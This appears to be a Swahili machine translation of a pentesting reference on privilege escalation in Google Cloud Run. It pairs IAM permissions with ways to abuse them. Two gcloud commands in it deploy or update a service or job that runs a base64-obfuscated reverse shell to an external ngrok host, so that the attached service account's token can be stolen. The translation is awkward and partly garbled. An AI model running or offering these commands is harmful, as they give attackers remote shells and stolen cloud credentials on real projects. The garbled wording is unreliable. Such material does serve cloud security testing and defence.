Kukimbia kwenye Wingu

Kwa habari zaidi kuhusu Kukimbia kwenye Wingu angalia:

run.services.create, iam.serviceAccounts.actAs, run.routes.invoke

Mshambuliaji mwenye ruhusa hizi za kuunda huduma ya kukimbia ikitekeleza nambari ya kupindukia (kontena ya Docker ya kupindukia), kuambatanisha Akaunti ya Huduma nayo, na kufanya nambari kuchukua tokeni ya Akaunti ya Huduma kutoka kwa metadata.

Script ya kudanganya kwa njia hii inaweza kupatikana hapa na picha ya Docker inaweza kupatikana hapa.

Tafadhali kumbuka kwamba wakati wa kutumia gcloud run deploy badala ya tu kuunda huduma inahitaji ruhusa ya update. Angalia mfano hapa.

run.services.update, iam.serviceAccounts.actAs

Kama ile iliyotangulia lakini kwa kuboresha huduma:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Jipatie ruhusa za awali juu ya Run ya wingu.

run.jobs.create, run.jobs.run, (run.jobs.get)

Zindua kazi na kabati la nyuma ili kuiba akaunti ya huduma iliyotajwa kwenye amri. Unaweza kupata exploit hapa.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Kama ilivyo kwa ile ya awali, ni inawezekana kuboresha kazi na kuboresha SA, amri na kuitekeleza:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Jipatie ruhusa za awali juu ya Kazi za Cloud.

Marejeo

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/